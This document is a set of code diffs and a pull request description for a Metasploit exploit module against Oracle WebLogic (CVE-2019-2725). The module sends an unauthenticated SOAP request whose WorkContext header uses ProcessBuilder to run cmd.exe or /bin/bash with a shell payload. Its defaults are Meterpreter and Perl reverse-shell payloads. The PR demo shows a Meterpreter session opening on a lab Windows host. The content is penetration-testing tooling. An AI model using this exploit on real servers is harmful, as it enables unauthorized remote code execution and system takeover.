-            <void class="java.lang.ProcessBuilder"> 
-              <array class="java.lang.String" length="3"> 
-                <void index="0"> 
-                  <string>#{xml_cmd}</string> 
-                </void> 
-                <void index="1"> 
-                  <string>#{param_cmd}</string> 
-                </void> 
-                <void index="2"> 
-                  <string>#{shell_payload.encode(xml: :text)}</string> 
-                </void> 
-              </array> 
-              <void method="start"/> 
-            </void> 
-          </work:WorkContext> 
-        </soapenv:Header> 
-        <soapenv:Body> 
-          <asy:onAsyncDelivery/> 
-        </soapenv:Body> 
+      <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"
+                        xmlns:wsa="http://www.w3.org/2005/08/addressing"
+                        xmlns:asy="http://www.bea.com/async/AsyncResponseService">
+        <soapenv:Header>
+          <wsa:Action>#{random_action}</wsa:Action>
+          <wsa:RelatesTo>#{random_relates}</wsa:RelatesTo>
+          <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
+            <void class="java.lang.ProcessBuilder">
+              <array class="java.lang.String" length="3">
+                <void index="0">
+                  <string>#{xml_cmd}</string>
+                </void>
+                <void index="1">
+                  <string>#{param_cmd}</string>
+                </void>
+                <void index="2">
+                  <string>#{shell_payload.encode(xml: :text)}</string>
+                </void>
+              </array>
+              <void method="start"/>
+            </void>
+          </work:WorkContext>
+        </soapenv:Header>
+        <soapenv:Body>
+          <asy:onAsyncDelivery/>
+        </soapenv:Body>
       </soapenv:Envelope>
     EOF
 
@@ -141,9 +142,6 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def exploit
-
     send_payload
-
-    #handler
   end
 end

--- a/modules/exploits/multi/misc/weblogic_deserialize_asyncresponseservice.rb
+++ b/modules/exploits/multi/misc/weblogic_deserialize_asyncresponseservice.rb
@@ -76,7 +76,7 @@ class MetasploitModule < Msf::Exploit::Remote
       ]
     )
   end
-  
+
   def create_soap_payload(xml_cmd, param_cmd, payload)
     <<~EOF
       <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"

--- a/modules/exploits/multi/misc/weblogic_deserialize_asyncresponseservice.rb
+++ b/modules/exploits/multi/misc/weblogic_deserialize_asyncresponseservice.rb
@@ -3,8 +3,6 @@
 # Current source: https://github.com/rapid7/metasploit-framework
 ##
 
-require 'msf/core/exploit/powershell'
-
 class MetasploitModule < Msf::Exploit::Remote
   Rank = ExcellentRanking
 
@@ -16,7 +14,7 @@ class MetasploitModule < Msf::Exploit::Remote
       'Name' => 'Oracle Weblogic Server Deserialization RCE - AsyncResponseService ',
       'Description' => %q{
         An unauthenticated attacker with network access to the Oracle Weblogic Server T3
-        interface can send a malicious SOAP request to the interface WLS AsyncResponseService
+        can send a malicious SOAP request to the WLS AsyncResponseService interface
         to execute code on the vulnerable host.
       },
       'Author' =>
@@ -26,6 +24,7 @@ class MetasploitModule < Msf::Exploit::Remote
       'License' => MSF_LICENSE,
       'References' =>
         [
+          ['CVE', '2019-2725'],
           ['CNVD-C', '2019-48814'],
           ['URL', 'http://www.cnvd.org.cn/webinfo/show/4999']
         ],
@@ -117,7 +116,7 @@ class MetasploitModule < Msf::Exploit::Remote
     soap_payload <<  xml_cmd # SO cli
 
     soap_payload <<  '          <void index="2"> '
-    soap_payload <<  "            <string>#{xml_encode(shell_payload)}</string> "
+    soap_payload <<  "            <string>#{shell_payload.encode(xml: :text)}</string> "
     soap_payload <<  '          </void> '
     soap_payload <<  '        </array> '
     soap_payload <<  '        <void method="start"/> '
@@ -130,32 +129,17 @@ class MetasploitModule < Msf::Exploit::Remote
     soap_payload <<  '</soapenv:Envelope>'
 
     res = send_request_cgi(
-      'uri'      => uri, #datastore['URIPATH'] + uri,
+      'uri'      => uri,
       'method'   => 'POST',
       'ctype'    => 'text/xml',
       'data'     => soap_payload,
       'headers'  => {'SOAPAction' => '' }
     )
 
-    if res and res.code != 202
+    if res && res.code != 202
       print_error("Failed to exploit the vulnerability on #{uri}")
       return
     end
-  end
-
-  def xml_encode(str)
-    ret = ""
-    str.unpack('C*').each { |ch|
-      case ch
-      when 0x41..0x5a, 0x61..0x7a, 0x30..0x39
-        ret << ch.chr
-      else
-        ret << "&#x"
-        ret << ch.chr.unpack('H*')[0]
-        ret << ";"
-      end
-    }
-    ret
   end
 
   def exploit

--- a/modules/exploits/multi/misc/weblogic_deserialize_asyncresponseservice.rb
+++ b/modules/exploits/multi/misc/weblogic_deserialize_asyncresponseservice.rb
@@ -81,21 +81,14 @@ class MetasploitModule < Msf::Exploit::Remote
 
     print_status("Generating payload...")
     # payload creation
-    if target.name == 'Windows'
-      xml_cmd = '          <void index="0"> '
-      xml_cmd <<  '            <string>cmd.exe</string> '
-      xml_cmd <<  '          </void> '
-      xml_cmd <<  '          <void index="1"> '
-      xml_cmd <<  '            <string>/c</string> '
-      xml_cmd <<  '          </void> '
+    case target.name
+    when 'Windows'
+      xml_cmd = "cmd.exe"
+      param_cmd = "/c"
       shell_payload = cmd_psh_payload(payload.encoded, payload_instance.arch.first, {remove_comspec: true, encoded: false })
-    elsif target.name == 'Unix' || target.name == 'Solaris'
-      xml_cmd =  '          <void index="0"> '
-      xml_cmd <<  '            <string>/bin/bash</string> '
-      xml_cmd <<  '          </void> '
-      xml_cmd <<  '          <void index="1"> '
-      xml_cmd <<  '            <string>-c</string> '
-      xml_cmd <<  '          </void> '
+    when 'Unix', 'Solaris'
+      xml_cmd = "/bin/bash"
+      param_cmd = "-c"
       shell_payload = payload.encoded
     end
 
@@ -103,30 +96,35 @@ class MetasploitModule < Msf::Exploit::Remote
     random_relates = rand_text_alphanumeric(20)
 
     print_status("[#{uri}] Sending payload...")
-    soap_payload = '<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" '
-    soap_payload <<  '  xmlns:wsa="http://www.w3.org/2005/08/addressing" '
-    soap_payload <<  '  xmlns:asy="http://www.bea.com/async/AsyncResponseService"> '
-    soap_payload <<  '  <soapenv:Header> '
-    soap_payload <<  "    <wsa:Action>#{random_action}</wsa:Action> "
-    soap_payload <<  "    <wsa:RelatesTo>#{random_relates}</wsa:RelatesTo> "
-    soap_payload <<  '    <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> '
-    soap_payload <<  '      <void class="java.lang.ProcessBuilder"> '
-    soap_payload <<  '        <array class="java.lang.String" length="3"> '
-
-    soap_payload <<  xml_cmd # SO cli
-
-    soap_payload <<  '          <void index="2"> '
-    soap_payload <<  "            <string>#{shell_payload.encode(xml: :text)}</string> "
-    soap_payload <<  '          </void> '
-    soap_payload <<  '        </array> '
-    soap_payload <<  '        <void method="start"/> '
-    soap_payload <<  '      </void> '
-    soap_payload <<  '    </work:WorkContext> '
-    soap_payload <<  '  </soapenv:Header> '
-    soap_payload <<  '  <soapenv:Body> '
-    soap_payload <<  '    <asy:onAsyncDelivery/> '
-    soap_payload <<  '  </soapenv:Body> '
-    soap_payload <<  '</soapenv:Envelope>'
+    soap_payload = <<~EOF
+      <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" 
+                        xmlns:wsa="http://www.w3.org/2005/08/addressing" 
+                        xmlns:asy="http://www.bea.com/async/AsyncResponseService"> 
+        <soapenv:Header> 
+          <wsa:Action>#{random_action}</wsa:Action> 
+          <wsa:RelatesTo>#{random_relates}</wsa:RelatesTo> 
+          <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> 
+            <void class="java.lang.ProcessBuilder"> 
+              <array class="java.lang.String" length="3"> 
+                <void index="0"> 
+                  <string>#{xml_cmd}</string> 
+                </void> 
+                <void index="1"> 
+                  <string>#{param_cmd}</string> 
+                </void> 
+                <void index="2"> 
+                  <string>#{shell_payload.encode(xml: :text)}</string> 
+                </void> 
+              </array> 
+              <void method="start"/> 
+            </void> 
+          </work:WorkContext> 
+        </soapenv:Header> 
+        <soapenv:Body> 
+          <asy:onAsyncDelivery/> 
+        </soapenv:Body> 
+      </soapenv:Envelope>
+    EOF
 
     res = send_request_cgi(
       'uri'      => uri,

--- a/modules/exploits/multi/misc/weblogic_deserialize_asyncresponseservice.rb
+++ b/modules/exploits/multi/misc/weblogic_deserialize_asyncresponseservice.rb
@@ -42,7 +42,6 @@ class MetasploitModule < Msf::Exploit::Remote
           ],
           [ 'Windows',
             'Platform' => 'win',
-            'Payload' => {},
             'Arch' => [ARCH_X64, ARCH_X86],
             'DefaultOptions' => {'PAYLOAD' => 'windows/meterpreter/reverse_tcp'}
           ],
@@ -51,8 +50,6 @@ class MetasploitModule < Msf::Exploit::Remote
             'Arch' => ARCH_CMD,
             'DefaultOptions' => {'PAYLOAD' => 'cmd/unix/reverse_perl'},
             'Payload' => {
-              'Space'       => 2048,
-              'DisableNops' => true,
               'Compat'      =>
                 {
                   'PayloadType' => 'cmd',
@@ -62,10 +59,6 @@ class MetasploitModule < Msf::Exploit::Remote
           ]
         ],
       'DefaultTarget' => 0,
-      'DefaultOptions' =>
-        {
-          'WfsDelay' => 12
-        },
       'DisclosureDate' => 'Apr 23 2019'))
 
     register_options(

--- a/modules/exploits/multi/misc/weblogic_deserialize_asyncresponseservice.rb
+++ b/modules/exploits/multi/misc/weblogic_deserialize_asyncresponseservice.rb
@@ -43,7 +43,7 @@ class MetasploitModule < Msf::Exploit::Remote
           [ 'Windows',
             'Platform' => 'win',
             'Payload' => {},
-	    'Arch' => [ARCH_X64, ARCH_X86],
+            'Arch' => [ARCH_X64, ARCH_X86],
             'DefaultOptions' => {'PAYLOAD' => 'windows/meterpreter/reverse_tcp'}
           ],
           [ 'Solaris',
@@ -71,7 +71,6 @@ class MetasploitModule < Msf::Exploit::Remote
     register_options(
       [
         Opt::RPORT(7001),
-	OptString.new('RHOSTS', [false]),
         OptString.new('URIPATH', [true, 'URL to the weblogic instance', '']),
         OptString.new('WSPATH', [true, 'URL to AsyncResponseService', '/_async/AsyncResponseService'])
       ]
@@ -84,20 +83,20 @@ class MetasploitModule < Msf::Exploit::Remote
     print_status("Generating payload...")
     # payload creation
     if target.name == 'Windows'
-      xml_cmd = "          <void index=\"0\"> "
-      xml_cmd <<  "            <string>cmd.exe</string> "
-      xml_cmd <<  "          </void> "
-      xml_cmd <<  "          <void index=\"1\"> "
-      xml_cmd <<  "            <string>/c</string> "
-      xml_cmd <<  "          </void> "
+      xml_cmd = '          <void index="0"> '
+      xml_cmd <<  '            <string>cmd.exe</string> '
+      xml_cmd <<  '          </void> '
+      xml_cmd <<  '          <void index="1"> '
+      xml_cmd <<  '            <string>/c</string> '
+      xml_cmd <<  '          </void> '
       shell_payload = cmd_psh_payload(payload.encoded, payload_instance.arch.first, {remove_comspec: true, encoded: false })
     elsif target.name == 'Unix' || target.name == 'Solaris'
-      xml_cmd =  "          <void index=\"0\"> "
-      xml_cmd <<  "            <string>/bin/bash</string> "
-      xml_cmd <<  "          </void> "
-      xml_cmd <<  "          <void index=\"1\"> "
-      xml_cmd <<  "            <string>-c</string> "
-      xml_cmd <<  "          </void> "
+      xml_cmd =  '          <void index="0"> '
+      xml_cmd <<  '            <string>/bin/bash</string> '
+      xml_cmd <<  '          </void> '
+      xml_cmd <<  '          <void index="1"> '
+      xml_cmd <<  '            <string>-c</string> '
+      xml_cmd <<  '          </void> '
       shell_payload = payload.encoded
     end
 
@@ -105,32 +104,30 @@ class MetasploitModule < Msf::Exploit::Remote
     random_relates = rand_text_alphanumeric(20)
 
     print_status("[#{uri}] Sending payload...")
-    soap_payload = "<soapenv:Envelope xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\" "
-    soap_payload <<  "  xmlns:wsa=\"http://www.w3.org/2005/08/addressing\" "
-    soap_payload <<  "  xmlns:asy=\"http://www.bea.com/async/AsyncResponseService\"> "
-    soap_payload <<  "  <soapenv:Header> "
+    soap_payload = '<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" '
+    soap_payload <<  '  xmlns:wsa="http://www.w3.org/2005/08/addressing" '
+    soap_payload <<  '  xmlns:asy="http://www.bea.com/async/AsyncResponseService"> '
+    soap_payload <<  '  <soapenv:Header> '
     soap_payload <<  "    <wsa:Action>#{random_action}</wsa:Action> "
-    soap_payload <<  "    <wsa:RelatesTo>#{random_relates}</wsa:RelatesTo> "
-    soap_payload <<  "    <work:WorkContext xmlns:work=\"http://bea.com/2004/06/soap/workarea/\"> "
-    soap_payload <<  "      <void class=\"java.lang.ProcessBuilder\"> "
-    soap_payload <<  "        <array class=\"java.lang.String\" length=\"3\"> "
+    soap_payload <<  '    <wsa:RelatesTo>#{random_relates}</wsa:RelatesTo> '
+    soap_payload <<  '    <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> '
+    soap_payload <<  '      <void class="java.lang.ProcessBuilder"> '
+    soap_payload <<  '        <array class="java.lang.String" length="3"> '
 
     soap_payload <<  xml_cmd # SO cli
 
-    soap_payload <<  "          <void index=\"2\"> "
+    soap_payload <<  '          <void index="2"> '
     soap_payload <<  "            <string>#{xml_encode(shell_payload)}</string> "
-    soap_payload <<  "          </void> "
-    soap_payload <<  "        </array> "
-    soap_payload <<  "        <void method=\"start\"/> "
-    soap_payload <<  "      </void> "
-    soap_payload <<  "    </work:WorkContext> "
-    soap_payload <<  "  </soapenv:Header> "
-    soap_payload <<  "  <soapenv:Body> "
-    soap_payload <<  "    <asy:onAsyncDelivery/> "
-    soap_payload <<  "  </soapenv:Body> "
-    soap_payload <<  "</soapenv:Envelope>"
-
-    print_status(shell_payload)
+    soap_payload <<  '          </void> '
+    soap_payload <<  '        </array> '
+    soap_payload <<  '        <void method="start"/> '
+    soap_payload <<  '      </void> '
+    soap_payload <<  '    </work:WorkContext> '
+    soap_payload <<  '  </soapenv:Header> '
+    soap_payload <<  '  <soapenv:Body> '
+    soap_payload <<  '    <asy:onAsyncDelivery/> '
+    soap_payload <<  '  </soapenv:Body> '
+    soap_payload <<  '</soapenv:Envelope>'
 
     res = send_request_cgi(
       'uri'      => uri, #datastore['URIPATH'] + uri,


### PR DESCRIPTION
Hello again,
I've been very busy lately, however, here you have another juicy contribution.
By the way, thank you so much for the acknowledgment in the articles (y)...

Please, add this exploit module for CVE-2019-2725, CNVD-C 2019-48814, Oracle Weblogic Deserialization Vulnerability in the WLS AsyncResponseService web service component.
It was tested on Windows 7 x64 and Ubuntu 14.04.4 x64 with Oracle Weblogic Server v10.3.6 and v12.1.3

More Info:
[1] https://medium.com/@knownseczoomeye/knownsec-404-team-oracle-weblogic-deserialization-rce-vulnerability-0day-alert-90dd9a79ae93
[2] https://www.oracle.com/technetwork/security-advisory/alert-cve-2019-2725-5466295.html
[3] https://www.oracle.com/technetwork/security-advisory/cpuapr2019-5072813.html


Please feel free to fix or add things!!!

## TODO
Fix the Unix payload to make it more generic
Add more payloads
More tests on Linux
Tests on Solaris
Documentation

## DEMO
```
 msf exploit(multi/misc/weblogic_deserialize_asyncresponseservice) > set uripath http://192.168.192.132
 uripath => http://192.168.192.132
 msf exploit(multi/misc/weblogic_deserialize_asyncresponseservice) > set wspath /_async/AsyncResponseService
 wspath => /_async/AsyncResponseService
 msf exploit(multi/misc/weblogic_deserialize_unicastref) > set rport 7001
 rport => 7001
 msf exploit(multi/misc/weblogic_deserialize_asyncresponseservice) > set lport 8888
 lport => 8888
 msf exploit(multi/misc/weblogic_deserialize_asyncresponseservice) > set lhost 192.168.192.129
 lhost => 192.168.192.129
 msf exploit(multi/misc/weblogic_deserialize_unicastref) > exploit
 [*] Started reverse TCP handler on 192.168.192.129:8888
 [*] Generating payload...
 [*] [/_async/AsyncResponseService] Sending payload...
 [*] Sending stage (179779 bytes) to 192.168.192.132
 [*] Meterpreter session 2 opened (192.168.192.129:8888 -> 192.168.192.132:53854) at 2019-04-25 16:49:49 -0700

 meterpreter > sysinfo
 Computer        : GIOTTO-HS-W7
 OS              : Windows 7 (Build 7600).
 Architecture    : x64
 System Language : en_US
 Domain          : WORKGROUP
 Logged On Users : 2
 Meterpreter     : x86/windows
```

## Verification

- [x] Start `msfconsole`
- [x] `use exploit/multi/misc/weblogic_deserialize_asyncresponseservice`
- [x] set uripath
- [x] set wspath
- [x] set rport
- [x] set lhost
- [x] set lport
- [x] exploit
- [x] `sessions -i 1`
- [x] Enjoy!!!
